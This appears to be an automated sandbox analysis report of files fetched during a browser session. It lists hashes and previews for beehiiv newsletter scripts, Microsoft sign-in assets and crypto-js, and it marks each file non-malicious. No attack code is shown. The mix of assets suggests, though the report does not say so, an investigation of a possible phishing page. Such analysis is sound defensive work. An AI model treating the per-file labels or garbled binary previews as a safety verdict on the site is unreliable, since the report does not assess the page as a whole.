                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/useWebBuilderCommunicator-DoXoLq6Y.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fd77d185-6d6e-5555-b201-070d4e61cd72")}catch(e){}}();.import{r as e,u as g,a as p}from"./index-D6da9p6-.js";const b=({isInitialLoadFromSwarm:d,publicationId:u})=>{const[t]=e.useState(d),[l,f]=e.useState(null),[h,I]=e.useState(null),s=g(),n=p(),i=n.pathname+n.search,c=n.search.includes("version=draft");e.useEffect(()=>{!t&&c&&s(".",{replace:!0})},[s,t,c]);const r=e.useCallback(function(){s(i,{replace:!0})},[s,i]);return e.useEffect(()=>{const o=m=>{const{data:a}=m;a?.publicationId===u&&t&&(a?.status==="refresh"&&r(),f(a?.sectionId),I(a?.nodeId))};return window.addEventListener("message",o),()=>{window.removeEventListener("message",o)}},[r,t]),{highlightedSectionId:l,highlightedNodeId:h}};export{b as u};.//# sourceMappingURL=useWebBuilderCommunicator-DoXoLq6Y.js.map..//# debugId=fd
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1062
                                                                                                                                            Entropy (8bit):7.729232835183738
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:eFl474pMDr/2bS7amtjvOA9QFo/qRQENtFEWPAIsO4fsuK9:eFl474p0T22C/RQENtZHsO4fw
                                                                                                                                            MD5:725681B49F77650B9C9B970EB784476C
                                                                                                                                            SHA1:03B9DC915273407F5BF71B54E216D1148C63F33C
                                                                                                                                            SHA-256:2ED6A58366FE3399DFA3196550769FA9B26C21AF6819E44F40B0530F202BA619
                                                                                                                                            SHA-512:AEEE5DB9078AEE4D97B2591F2B974D0564D18A82F32FCD33154D29C21BC3AE188DC16726BFA76644D127059D051757ACB1E0FA2D92B4016003780965F4A9B4C9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_account_aad_c5cbcbb43e61b1347b12589901000621.png
                                                                                                                                            Preview:.PNG........IHDR...0...0.....W.......pHYs...........~.....IDATh..Z-L$1..n......"..q........Kr$.. ....'AA......,.*.....+.C....Lw..%.t........v~....(.R#...... ....... .....[.!]...@W....N...U.Y.!...g..SpI...dV@)E...`./..N...Ap..p&..R4.......V5...f.J....H........PJ....:..A.T.2.G...'..K,b....L....SSS.yxxH,.<S.u...5...2ag].......C...<.e.G...d..U&.W.lBWWWx~~..d.3.QaG...x.....66....H~..7...!B.d..H...=..z.`\.j...%WI.Z.OOO.{.......!.....=",s{{..wvv....$...: ..s.........c188.....j..7..J\(....E..,.t..lL(..`...."................D..)....-3#4...8.Lf.8...].^2..'zzz0<<.%.P..5.....E.e...e........V+.[J....@\X...r+..lmm...Q.wwwcff&.|..,.y.FC.`......*.........1.........h...L,D....Ym......mFP..>o.....`..L.y.Q+.Y.7.&''.<...l..<.$..^@....<...,..)*......p..$.....;mF.c...U.R{.EI.S.E.....R..\|..7..r<RIB...4=.l...k].d..6::..lAh.F....v.c.&.f]..#i.z!.P(.........4-Gs.R....=...9.J| B....... .j..4.Bs.C.G...s.......R.*....a.......j..S$..k..4)t.<.....p:..w.xC..8.vK..NK....|WLx
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3620
                                                                                                                                            Entropy (8bit):6.867828878374734
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (31550)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):64195
                                                                                                                                            Entropy (8bit):5.298149732253655
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lhhCkW8z8HHXIrKR9sAP4jX4booExTF9t0LogqGVZLMU37dPKsl1gvr:RcXIrKR9PQjX4soEf2VZIU37dLor
                                                                                                                                            MD5:4E7AEDE94DAFB84AC4C147C35C045EB8
                                                                                                                                            SHA1:FC6C27057C42068DA11744E310C8A3920635AD92
                                                                                                                                            SHA-256:826A52CF721B2E2F4B4C57F85F01C651F3474FCA9E894F486BEA523D10C2236F
                                                                                                                                            SHA-512:8878444C41F10B91D669CCE919420B3901AA6D242B19023FA08DBEB42895013133D7FD692BF411BDA5AC475F59F4285DD006D9A20536B2ADB72FBE64E0CF0BB4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-D6da9p6-.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f7a0b46c-c6e2-545b-a1e5-f4e6dbf6d5e1")}catch(e){}}();.function Xr(e,t){for(var r=0;r<t.length;r++){const n=t[r];if(typeof n!="string"&&!Array.isArray(n)){for(const a in n)if(a!=="default"&&!(a in e)){const l=Object.getOwnPropertyDescriptor(n,a);l&&Object.defineProperty(e,a,l.get?l:{enumerable:!0,get:()=>n[a]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}))}var Da=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function Qr(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}var pr={exports:{}},L={};/**. * @license React. * react.production.js. *. * Copyright (c) Meta Platforms, Inc. and affiliates.. *. * This source code is licensed under the MIT li
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35170
                                                                                                                                            Entropy (8bit):7.993096534744333
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):17174
                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):48316
                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):496
                                                                                                                                            Entropy (8bit):5.473395041029162
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSys8ch8NwtyeWZbDo7592XaqfQs8cht:UgqHHVvCaRuSysx2N5eca9wMsxn
                                                                                                                                            MD5:E9D4FF82237A4CB8FC2FA7AABA53ABC4
                                                                                                                                            SHA1:E907261963EEDC8D0E0619096EA231570457D0F4
                                                                                                                                            SHA-256:0E8048C01ABF8CD2FD001A5C3CF928C6F29B801172CC12149FCA6D7B304AE3EA
                                                                                                                                            SHA-512:BA36CD3C36E83A76EBAE32357DE3B8C02E4F1AAF738AF3367D90F54B25B615140F6B0D63897952D58D71A7E59AFD85E0A5B731439ABC52BB8C44BB9B2862E7F2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-BFDoivjB.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d71a12c4-e6fa-5fd3-a5b2-c030ba2959a2")}catch(e){}}();.const r=(t="")=>{if(!t)return"";try{const n=new URL(t);return n.protocol="https:",n.origin+n.pathname}catch{return""}},o=r;export{o as g};.//# sourceMappingURL=index-BFDoivjB.js.map..//# debugId=d71a12c4-e6fa-5fd3-a5b2-c030ba2959a2.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):122725
                                                                                                                                            Entropy (8bit):7.997347629519925
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                                                                                            MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                                                                                            SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                                                                                            SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                                                                                            SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                                                                                                                            Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (24575)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):341783
                                                                                                                                            Entropy (8bit):5.365461465723979
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:oGkYd0QBY+kY764KG/45I6EA5Xf53a5EiT:30F+d64Ks45I6EcRoT
                                                                                                                                            MD5:8627C44F68F03960DDD99D49E73E20CB
                                                                                                                                            SHA1:2D986F5986FB2AC3FF804939A8737CD2D6FAA639
                                                                                                                                            SHA-256:EDA1A1976E128EC5514869A97DBAC238D8D7731D1A989FCA849E88A908CD65DE
                                                                                                                                            SHA-512:189A0940680E82C26AB76516A570E3BD9A18411F19ECA81F90B6772E535200552AE4D4125B51757397EED44DA2C22219FE2DAEC7C3F7F38C384B37CD2A1CADB9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/entry.client-CuBsnk-1.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="988d032a-e031-5042-b7d4-6b13b4ed5582")}catch(e){}}();.import{j as ns}from"./jsx-runtime-BjG_zV1W.js";import{c as me,r as U,J as uy,E as Gl,K as oy,y as cy,C as fy,L as dy,M as hy,P as my,g as py,a as yy}from"./index-D6da9p6-.js";import{r as Ji,d as gy}from"./dayjs.min-B8CfgAhU.js";import{i as vy,p as dc,_ as as,s as Bn,a as Sy,b as _y,c as by,d as Ey,e as My,f as wy,g as Ry,h as Ty,u as Ay,j as Oy,S as Dy,k as xy,l as Cy,m as zy,n as gd,o as ky,q as Ny,r as Uy,t as Ly}from"./performance-dfU_ZKaW.js";import{G as Zs,a as Ie,d as vd,b as hc,e as Hy,f as By,s as mc,S as qy,l as rt,c as Sd,h as _d,i as jy,j as Yy,n as bd,k as Xy,m as Gy,r as pc,o as Vy,u as Qy,p as Iy,q as Zy,t as Ky,v as Jy,g as Fy}from"./AppGlobals-2Br-8bZs.js";import{i as Ks}from"./i18next-BV1g0mjb.js";import{g as
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3720)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4087
                                                                                                                                            Entropy (8bit):5.383346971286598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Qql8ewtMDRvkGvhJI3C7iYd5yrjNVwU3k78o2pTsVUHKWXe:5QwRcGMS7UV70UtsVUqX
                                                                                                                                            MD5:B17C2F05D9CE765ED732F5865598AF97
                                                                                                                                            SHA1:D5DCB8F9374345C64F3AF65F134C4C0FFDA0D10C
                                                                                                                                            SHA-256:59CECCE22EBEB5BEF6645BA62A5DDC9D21DD7E4E5F8FA3B53506B3C673CC82EC
                                                                                                                                            SHA-512:90E9D8AB9D407C71D672E0B0718EED31E1D2E721A966897B9C04CDAD9F887E3EC53968B37C30018C73365A01F0E1B3FE5114EB76674F414490C1D2F7802F2673
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/useTranslation-CfKJAmGY.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b446271b-ea24-50dc-a052-26fc7486002e")}catch(e){}}();.import{r as d}from"./index-D6da9p6-.js";import{I as $,R as k,g as A,a as F}from"./context-CxfOs_9L.js";function M(){if(console&&console.warn){for(var t=arguments.length,e=new Array(t),n=0;n<t;n++)e[n]=arguments[n];typeof e[0]=="string"&&(e[0]=`react-i18next:: ${e[0]}`),console.warn(...e)}}const T={};function C(){for(var t=arguments.length,e=new Array(t),n=0;n<t;n++)e[n]=arguments[n];typeof e[0]=="string"&&T[e[0]]||(typeof e[0]=="string"&&(T[e[0]]=new Date),M(...e))}const v=(t,e)=>()=>{if(t.isInitialized)e();else{const n=()=>{setTimeout(()=>{t.off("initialized",n)},0),e()};t.on("initialized",n)}};function S(t,e,n){t.loadNamespaces(e,v(t,n))}function R(t,e,n,a){typeof n=="string"&&(n=[n]),n.forEach(i=>{t.options.ns.indexOf(i)<0&
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):122725
                                                                                                                                            Entropy (8bit):7.997347629519925
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                                                                                            MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                                                                                            SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                                                                                            SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                                                                                            SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (5099)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9596
                                                                                                                                            Entropy (8bit):5.651009861031609
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:LEnlSPI8IWIsIEIvIgI0I/I3IdedP1wFr+4FcV/GE6QabAbD1SHx6D9ZSzFvhoD+:MlSwlrVtQZdgY0wEAHAbD/9EXoM0Vc
                                                                                                                                            MD5:AC58E4E0C677252A6BDB6C18233CF475
                                                                                                                                            SHA1:71695FFC269FFC0E5D699240B955870DEBCC20A3
                                                                                                                                            SHA-256:8038D93627C15E83F6E695A28830713D7189518C5281354624DA0D1CDD4C6910
                                                                                                                                            SHA-512:9EE77C534D40A35138A29638EA598A0F8F7C024EDC456ADAC20AC5A028C08A4A0A3A43DD71EC951E2B45C0B8A9012D8210FFFE2742A4A2D48C3449FA520FFD7A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/TwitterEmbed-wIDCDAXa.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0c0f59e1-ca5d-5613-9b3a-6d1ed902a60d")}catch(e){}}();.import{j as o}from"./jsx-runtime-BjG_zV1W.js";import{g as y,r as d,u as K}from"./index-D6da9p6-.js";import{T as M}from"./index-BdpAPpdN.js";import{u as k}from"./useTranslation-CfKJAmGY.js";import{L as E}from"./components-Oj2xMfGE.js";import{F as j}from"./ArrowLeftIcon-Dz9QYxn0.js";const g={inter:"Inter",libre_caslon_text:"Libre Caslon Text",space_mono:"Space Mono",quicksand:"Quicksand"},N={inter:{family:"Inter",variants:["100","200","300","regular","500","600","700","800","900"],subsets:["cyrillic","cyrillic-ext","greek","greek-ext","latin","latin-ext","vietnamese"],version:"v12",lastModified:"2022-09-22",files:{100:"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyeMZhrib2Bg-4.ttf",200:"http
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (5219)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11350
                                                                                                                                            Entropy (8bit):5.420207711957301
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:HJXKFXNnqpd+VQseCnVPwbGybNjqAAHembBnb9inDer4zMyQ2X+WyT8II+j0Dy:hKFXNnqp4VTVI6OUAAHeOb9inhm2XpyV
                                                                                                                                            MD5:CDB21B0E334A8B6268A401B0C5855ADA
                                                                                                                                            SHA1:BB8EDF2648276F004062994014A01F0B3B76F844
                                                                                                                                            SHA-256:4F149AE4B693E9E93B9094F70400F0AF1CA9B20D553A9E04187D95F06C2E02DA
                                                                                                                                            SHA-512:B901E69C35F0D464354C3B54BD3C3423ABA5A75C18322EC5C3487887CB86E9297758A94ADFCBED03502AD86F6ADBB96BF1481DAF85B8C09389B8FF8700912865
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="1ab5baf0-06d1-516c-b13b-718e500199e0")}catch(e){}}();.import{r as c}from"./index-D6da9p6-.js";let S={data:""},_=t=>typeof window=="object"?((t?t.querySelector("#_goober"):window._goober)||Object.assign((t||document.head).appendChild(document.createElement("style")),{innerHTML:" ",id:"_goober"})).firstChild:t||S,H=/(?:([\u0080-\uFFFF\w-%@]+) *:? *([^{;]+?);|([^;}{]*?) *{)|(}\s*)/g,L=/\/\*[^]*?\*\/| +/g,D=/\n+/g,b=(t,e)=>{let a="",s="",o="";for(let r in t){let n=t[r];r[0]=="@"?r[1]=="i"?a=r+" "+n+";":s+=r[1]=="f"?b(n,r):r+"{"+b(n,r[1]=="k"?"":e)+"}":typeof n=="object"?s+=b(n,e?e.replace(/([^,])+/g,i=>r.replace(/(^:.*)|([^,])+/g,l=>/&/.test(l)?l.replace(/&/g,i):i?i+" "+l:l)):r):n!=null&&(r=/^--/.test(r)?r:r.replace(/[A-Z]/g,"-$&").toLowerCase(),o+=b.p?b.p(r,n):r+":"+n+";")}return a
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
